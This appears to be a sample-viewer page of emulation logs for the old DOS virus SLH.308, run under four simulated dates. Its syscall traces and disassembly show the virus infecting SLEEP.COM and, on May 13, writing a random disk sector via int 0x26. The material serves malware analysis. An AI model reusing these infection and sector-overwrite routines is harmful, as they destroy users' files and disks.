Sample viewer

vx.netlux.org/Virus.DOS.SLH.308

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:33:21.493213164Z 26 PC: 13e60 | Set disk transfer address
2018-12-17T22:33:21.494812177Z 78 PC: 13e6a | Find first file
2018-12-17T22:33:21.500702653Z 61 PC: 13e75 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:33:21.507293804Z 63 PC: 13e81 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:33:21.523755286Z 66 PC: 13ea1 | Move file pointer
2018-12-17T22:33:21.525567968Z 44 PC: 13eac | Get time 0x13eac: or dx, dx
0x13eae: je 0x13ea8
0x13eb0: mov word ptr [bp + 0x238], dx
0x13eb4: call 0x13f4b
0x13eb7: mov ax, 0x4200
0x13eba: xor cx, cx
0x13ebc: xor dx, dx
0x13ebe: int 0x21
0x13ec0: mov ah, 0x40
0x13ec2: mov cx, 4
0x13ec5: lea dx, word ptr [bp + 0x205]
0x13ec9: int 0x21
0x13ecb: mov ah, 0x3e
0x13ecd: int 0x21
0x13ecf: jmp 0x13ed9
0x13ed1: mov ah, 0x3e
0x13ed3: int 0x21
0x13ed5: mov ah, 0x4f
0x13ed7: jmp 0x13e68
0x13ed9: mov dx, 0x80
2018-12-17T22:33:21.528887976Z 64 PC: 13f59 | Write file or device (Write 308 bytes on handle 5)
2018-12-17T22:33:21.543508177Z 66 PC: 13ec0 | Move file pointer
2018-12-17T22:33:21.545476455Z 64 PC: 13ecb | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:33:21.55218944Z 62 PC: 13ecf | Close file
2018-12-17T22:33:21.560397077Z 26 PC: 13ee0 | Set disk transfer address
2018-12-17T22:33:21.56258858Z 42 PC: 13ee4 | Get date 0x13ee4: cmp al, 5
0x13ee6: jne 0x13f12
0x13ee8: cmp dl, 0xd
0x13eeb: jne 0x13f12
0x13eed: pushf
0x13eee: in al, 0x40
0x13ef0: mov ah, al
0x13ef2: in al, 0x40
0x13ef4: xchg ax, dx
0x13ef5: mov al, 2
0x13ef7: lea bx, word ptr [bp + 0x12a]
0x13efb: mov cx, 1
0x13efe: int 0x26
0x13f00: popf
0x13f01: mov ah, 2
0x13f03: xor bh, bh
0x13f05: mov dh, 0xc
0x13f07: mov dl, 0x20
0x13f09: int 0x10
0x13f0b: mov ah, 9
2018-12-17T22:33:21.565140885Z 48 PC: 12a4b | Get DOS version
2018-12-17T22:33:21.56622752Z 53 PC: 12b83 | Get interrupt vector (Interrupt = '0' AKA 'Program terminate')
2018-12-17T22:33:21.568493647Z 53 PC: 12b90 | Get interrupt vector (Interrupt = '4' AKA 'Auxiliary output')
2018-12-17T22:33:21.569969458Z 53 PC: 12b9d | Get interrupt vector (Interrupt = '5' AKA 'Printer output')
2018-12-17T22:33:21.571421945Z 53 PC: 12baa | Get interrupt vector (Interrupt = '6' AKA 'Direct console I/O')
2018-12-17T22:33:21.573776827Z 37 PC: 12bbe | Set interrupt vector (Interrupt = '0' AKA 'Program terminate')
2018-12-17T22:33:21.575091811Z 74 PC: 12af3 | Reallocate memory
2018-12-17T22:33:21.577186981Z 68 PC: 1367f | I/O control for devices (Set for = '�� ')
2018-12-17T22:33:21.579937752Z 68 PC: 1367f | I/O control for devices (Set for = '� ��')
2018-12-17T22:33:21.582443619Z 64 PC: 137aa | Write file or device (Write 60 bytes on handle 1)
2018-12-17T22:33:21.587026762Z 64 PC: 137aa | Write file or device (Write 1 bytes on handle 1)
2018-12-17T22:33:21.590694105Z 64 PC: 137aa | Write file or device (Write 1 bytes on handle 1)
2018-12-17T22:33:21.595469848Z 64 PC: 137aa | Write file or device (Write 28 bytes on handle 1)
2018-12-17T22:33:21.598374675Z 64 PC: 137aa | Write file or device (Write 1 bytes on handle 1)
2018-12-17T22:33:21.601781898Z 64 PC: 137aa | Write file or device (Write 1 bytes on handle 1)
2018-12-17T22:33:21.606397591Z 37 PC: 12bca | Set interrupt vector (Interrupt = '0' AKA 'Program terminate')
2018-12-17T22:33:21.607721569Z 37 PC: 12bd5 | Set interrupt vector (Interrupt = '4' AKA 'Auxiliary output')
2018-12-17T22:33:21.610253467Z 37 PC: 12be0 | Set interrupt vector (Interrupt = '5' AKA 'Printer output')
2018-12-17T22:33:21.611568223Z 37 PC: 12beb | Set interrupt vector (Interrupt = '6' AKA 'Direct console I/O')
2018-12-17T22:33:21.612702443Z 76 PC: 12b74 | Terminate with return code (Return code = '1')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5967,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:58:09.766575731Z 26 PC: 13e60 | Set disk transfer address
2018-12-25T11:58:09.772897286Z 78 PC: 13e6a | Find first file
2018-12-25T11:58:09.79130905Z 61 PC: 13e75 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:58:09.799325144Z 63 PC: 13e81 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:58:09.821323502Z 66 PC: 13ea1 | Move file pointer
2018-12-25T11:58:09.829826274Z 44 PC: 13eac | Get time 0x13eac: or dx, dx
0x13eae: je 0x13ea8
0x13eb0: mov word ptr [bp + 0x238], dx
0x13eb4: call 0x13f4b
0x13eb7: mov ax, 0x4200
0x13eba: xor cx, cx
0x13ebc: xor dx, dx
0x13ebe: int 0x21
0x13ec0: mov ah, 0x40
0x13ec2: mov cx, 4
0x13ec5: lea dx, word ptr [bp + 0x205]
0x13ec9: int 0x21
0x13ecb: mov ah, 0x3e
0x13ecd: int 0x21
0x13ecf: jmp 0x13ed9
0x13ed1: mov ah, 0x3e
0x13ed3: int 0x21
0x13ed5: mov ah, 0x4f
0x13ed7: jmp 0x13e68
0x13ed9: mov dx, 0x80
2018-12-25T11:58:09.832468682Z 64 PC: 13f59 | Write file or device (Write 308 bytes on handle 5)
2018-12-25T11:58:09.866653734Z 66 PC: 13ec0 | Move file pointer
2018-12-25T11:58:09.869644131Z 64 PC: 13ecb | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:58:09.876483858Z 62 PC: 13ecf | Close file
2018-12-25T11:58:09.884020521Z 26 PC: 13ee0 | Set disk transfer address
2018-12-25T11:58:09.885820231Z 42 PC: 13ee4 | Get date 0x13ee4: cmp al, 5
0x13ee6: jne 0x13f12
0x13ee8: cmp dl, 0xd
0x13eeb: jne 0x13f12
0x13eed: pushf
0x13eee: in al, 0x40
0x13ef0: mov ah, al
0x13ef2: in al, 0x40
0x13ef4: xchg ax, dx
0x13ef5: mov al, 2
0x13ef7: lea bx, word ptr [bp + 0x12a]
0x13efb: mov cx, 1
0x13efe: int 0x26
0x13f00: popf
0x13f01: mov ah, 2
0x13f03: xor bh, bh
0x13f05: mov dh, 0xc
0x13f07: mov dl, 0x20
0x13f09: int 0x10
0x13f0b: mov ah, 9
2018-12-25T11:58:09.887566551Z 48 PC: 12a4b | Get DOS version
2018-12-25T11:58:09.889081717Z 53 PC: 12b83 | Get interrupt vector (Interrupt = '0' AKA 'Program terminate')
2018-12-25T11:58:09.891871309Z 53 PC: 12b90 | Get interrupt vector (Interrupt = '4' AKA 'Auxiliary output')
2018-12-25T11:58:09.894073132Z 53 PC: 12b9d | Get interrupt vector (Interrupt = '5' AKA 'Printer output')
2018-12-25T11:58:09.89568781Z 53 PC: 12baa | Get interrupt vector (Interrupt = '6' AKA 'Direct console I/O')
2018-12-25T11:58:09.904551683Z 37 PC: 12bbe | Set interrupt vector (Interrupt = '0' AKA 'Program terminate')
2018-12-25T11:58:09.906842325Z 74 PC: 12af3 | Reallocate memory
2018-12-25T11:58:09.909312822Z 68 PC: 1367f | I/O control for devices (Set for = '�� ')
2018-12-25T11:58:09.911612431Z 68 PC: 1367f | I/O control for devices (See above)
2018-12-25T11:58:09.918552621Z 64 PC: 137aa | Write file or device (Write 60 bytes on handle 1)
2018-12-25T11:58:09.922420836Z 64 PC: 137aa | Write file or device (See above)
2018-12-25T11:58:09.92457658Z 64 PC: 137aa | Write file or device (See above)
2018-12-25T11:58:09.928277705Z 64 PC: 137aa | Write file or device (See above)
2018-12-25T11:58:09.930926165Z 64 PC: 137aa | Write file or device (See above)
2018-12-25T11:58:09.933078098Z 64 PC: 137aa | Write file or device (See above)
2018-12-25T11:58:09.937482585Z 37 PC: 12bca | Set interrupt vector (Interrupt = '0' AKA 'Program terminate')
2018-12-25T11:58:09.938660772Z 37 PC: 12bd5 | Set interrupt vector (Interrupt = '4' AKA 'Auxiliary output')
2018-12-25T11:58:09.939852439Z 37 PC: 12be0 | Set interrupt vector (Interrupt = '5' AKA 'Printer output')
2018-12-25T11:58:09.941607454Z 37 PC: 12beb | Set interrupt vector (Interrupt = '6' AKA 'Direct console I/O')
2018-12-25T11:58:09.942643353Z 76 PC: 12b74 | Terminate with return code (Return code = '1')

{"DateBased":true,"Day":4,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5967,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:58:09.800634896Z 26 PC: 13e60 | Set disk transfer address
2018-12-25T11:58:09.802477361Z 78 PC: 13e6a | Find first file
2018-12-25T11:58:09.806502655Z 61 PC: 13e75 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:58:09.811196415Z 63 PC: 13e81 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:58:09.815969798Z 66 PC: 13ea1 | Move file pointer
2018-12-25T11:58:09.817081285Z 44 PC: 13eac | Get time 0x13eac: or dx, dx
0x13eae: je 0x13ea8
0x13eb0: mov word ptr [bp + 0x238], dx
0x13eb4: call 0x13f4b
0x13eb7: mov ax, 0x4200
0x13eba: xor cx, cx
0x13ebc: xor dx, dx
0x13ebe: int 0x21
0x13ec0: mov ah, 0x40
0x13ec2: mov cx, 4
0x13ec5: lea dx, word ptr [bp + 0x205]
0x13ec9: int 0x21
0x13ecb: mov ah, 0x3e
0x13ecd: int 0x21
0x13ecf: jmp 0x13ed9
0x13ed1: mov ah, 0x3e
0x13ed3: int 0x21
0x13ed5: mov ah, 0x4f
0x13ed7: jmp 0x13e68
0x13ed9: mov dx, 0x80
2018-12-25T11:58:09.818667818Z 64 PC: 13f59 | Write file or device (Write 308 bytes on handle 5)
2018-12-25T11:58:11.536115572Z 66 PC: 13ec0 | Move file pointer
2018-12-25T11:58:11.537601969Z 64 PC: 13ecb | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:58:11.543815758Z 62 PC: 13ecf | Close file
2018-12-25T11:58:11.5703054Z 26 PC: 13ee0 | Set disk transfer address
2018-12-25T11:58:11.572178239Z 42 PC: 13ee4 | Get date 0x13ee4: cmp al, 5
0x13ee6: jne 0x13f12
0x13ee8: cmp dl, 0xd
0x13eeb: jne 0x13f12
0x13eed: pushf
0x13eee: in al, 0x40
0x13ef0: mov ah, al
0x13ef2: in al, 0x40
0x13ef4: xchg ax, dx
0x13ef5: mov al, 2
0x13ef7: lea bx, word ptr [bp + 0x12a]
0x13efb: mov cx, 1
0x13efe: int 0x26
0x13f00: popf
0x13f01: mov ah, 2
0x13f03: xor bh, bh
0x13f05: mov dh, 0xc
0x13f07: mov dl, 0x20
0x13f09: int 0x10
0x13f0b: mov ah, 9
2018-12-25T11:58:11.575209719Z 48 PC: 12a4b | Get DOS version
2018-12-25T11:58:11.578269785Z 53 PC: 12b83 | Get interrupt vector (Interrupt = '0' AKA 'Program terminate')
2018-12-25T11:58:11.580361843Z 53 PC: 12b90 | Get interrupt vector (Interrupt = '4' AKA 'Auxiliary output')
2018-12-25T11:58:11.581577855Z 53 PC: 12b9d | Get interrupt vector (Interrupt = '5' AKA 'Printer output')
2018-12-25T11:58:11.583073468Z 53 PC: 12baa | Get interrupt vector (Interrupt = '6' AKA 'Direct console I/O')
2018-12-25T11:58:11.592809714Z 37 PC: 12bbe | Set interrupt vector (Interrupt = '0' AKA 'Program terminate')
2018-12-25T11:58:11.593971007Z 74 PC: 12af3 | Reallocate memory
2018-12-25T11:58:11.595828669Z 68 PC: 1367f | I/O control for devices (Set for = '�� ')
2018-12-25T11:58:11.59968235Z 68 PC: 1367f | I/O control for devices (See above)
2018-12-25T11:58:11.601981747Z 64 PC: 137aa | Write file or device (Write 60 bytes on handle 1)
2018-12-25T11:58:11.606574918Z 64 PC: 137aa | Write file or device (See above)
2018-12-25T11:58:11.610275929Z 64 PC: 137aa | Write file or device (See above)
2018-12-25T11:58:11.615861643Z 64 PC: 137aa | Write file or device (See above)
2018-12-25T11:58:11.618658094Z 64 PC: 137aa | Write file or device (See above)
2018-12-25T11:58:11.623478366Z 64 PC: 137aa | Write file or device (See above)
2018-12-25T11:58:11.627929625Z 37 PC: 12bca | Set interrupt vector (Interrupt = '0' AKA 'Program terminate')
2018-12-25T11:58:11.629325457Z 37 PC: 12bd5 | Set interrupt vector (Interrupt = '4' AKA 'Auxiliary output')
2018-12-25T11:58:11.631779735Z 37 PC: 12be0 | Set interrupt vector (Interrupt = '5' AKA 'Printer output')
2018-12-25T11:58:11.633182174Z 37 PC: 12beb | Set interrupt vector (Interrupt = '6' AKA 'Direct console I/O')
2018-12-25T11:58:11.634597119Z 76 PC: 12b74 | Terminate with return code (Return code = '1')

{"DateBased":true,"Day":13,"Month":6,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5967,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:58:09.806954784Z 26 PC: 13e60 | Set disk transfer address
2018-12-25T11:58:09.809529416Z 78 PC: 13e6a | Find first file
2018-12-25T11:58:09.816907201Z 61 PC: 13e75 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:58:09.824674781Z 63 PC: 13e81 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:58:09.8324428Z 66 PC: 13ea1 | Move file pointer
2018-12-25T11:58:09.835122181Z 44 PC: 13eac | Get time 0x13eac: or dx, dx
0x13eae: je 0x13ea8
0x13eb0: mov word ptr [bp + 0x238], dx
0x13eb4: call 0x13f4b
0x13eb7: mov ax, 0x4200
0x13eba: xor cx, cx
0x13ebc: xor dx, dx
0x13ebe: int 0x21
0x13ec0: mov ah, 0x40
0x13ec2: mov cx, 4
0x13ec5: lea dx, word ptr [bp + 0x205]
0x13ec9: int 0x21
0x13ecb: mov ah, 0x3e
0x13ecd: int 0x21
0x13ecf: jmp 0x13ed9
0x13ed1: mov ah, 0x3e
0x13ed3: int 0x21
0x13ed5: mov ah, 0x4f
0x13ed7: jmp 0x13e68
0x13ed9: mov dx, 0x80
2018-12-25T11:58:09.838148241Z 64 PC: 13f59 | Write file or device (Write 308 bytes on handle 5)
2018-12-25T11:58:09.85519358Z 66 PC: 13ec0 | Move file pointer
2018-12-25T11:58:09.857853182Z 64 PC: 13ecb | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:58:09.865810184Z 62 PC: 13ecf | Close file
2018-12-25T11:58:09.88262834Z 26 PC: 13ee0 | Set disk transfer address
2018-12-25T11:58:09.885375467Z 42 PC: 13ee4 | Get date 0x13ee4: cmp al, 5
0x13ee6: jne 0x13f12
0x13ee8: cmp dl, 0xd
0x13eeb: jne 0x13f12
0x13eed: pushf
0x13eee: in al, 0x40
0x13ef0: mov ah, al
0x13ef2: in al, 0x40
0x13ef4: xchg ax, dx
0x13ef5: mov al, 2
0x13ef7: lea bx, word ptr [bp + 0x12a]
0x13efb: mov cx, 1
0x13efe: int 0x26
0x13f00: popf
0x13f01: mov ah, 2
0x13f03: xor bh, bh
0x13f05: mov dh, 0xc
0x13f07: mov dl, 0x20
0x13f09: int 0x10
0x13f0b: mov ah, 9
2018-12-25T11:58:09.889419132Z 9 PC: 13f12 | Display string (Could not find end pointer)
2018-12-25T11:58:10.031547668Z 48 PC: 12a4b | Get DOS version
2018-12-25T11:58:10.034285454Z 53 PC: 12b83 | Get interrupt vector (Interrupt = '0' AKA 'Program terminate')
2018-12-25T11:58:10.035741141Z 53 PC: 12b90 | Get interrupt vector (Interrupt = '4' AKA 'Auxiliary output')
2018-12-25T11:58:10.037400518Z 53 PC: 12b9d | Get interrupt vector (Interrupt = '5' AKA 'Printer output')
2018-12-25T11:58:10.041912817Z 53 PC: 12baa | Get interrupt vector (Interrupt = '6' AKA 'Direct console I/O')
2018-12-25T11:58:10.043537129Z 37 PC: 12bbe | Set interrupt vector (Interrupt = '0' AKA 'Program terminate')
2018-12-25T11:58:10.045489473Z 74 PC: 12af3 | Reallocate memory
2018-12-25T11:58:10.048180233Z 68 PC: 1367f | I/O control for devices (Set for = '�� ')
2018-12-25T11:58:10.052137726Z 68 PC: 1367f | I/O control for devices (See above)
2018-12-25T11:58:10.055456237Z 64 PC: 137aa | Write file or device (Write 60 bytes on handle 1)
2018-12-25T11:58:10.063017342Z 64 PC: 137aa | Write file or device (See above)
2018-12-25T11:58:10.067301734Z 64 PC: 137aa | Write file or device (See above)
2018-12-25T11:58:10.073378404Z 64 PC: 137aa | Write file or device (See above)
2018-12-25T11:58:10.086860131Z 64 PC: 137aa | Write file or device (See above)
2018-12-25T11:58:10.091408131Z 64 PC: 137aa | Write file or device (See above)
2018-12-25T11:58:10.104676022Z 37 PC: 12bca | Set interrupt vector (Interrupt = '0' AKA 'Program terminate')
2018-12-25T11:58:10.107027767Z 37 PC: 12bd5 | Set interrupt vector (Interrupt = '4' AKA 'Auxiliary output')
2018-12-25T11:58:10.109634092Z 37 PC: 12be0 | Set interrupt vector (Interrupt = '5' AKA 'Printer output')
2018-12-25T11:58:10.111014458Z 37 PC: 12beb | Set interrupt vector (Interrupt = '6' AKA 'Direct console I/O')
2018-12-25T11:58:10.112363193Z 76 PC: 12b74 | Terminate with return code (Return code = '1')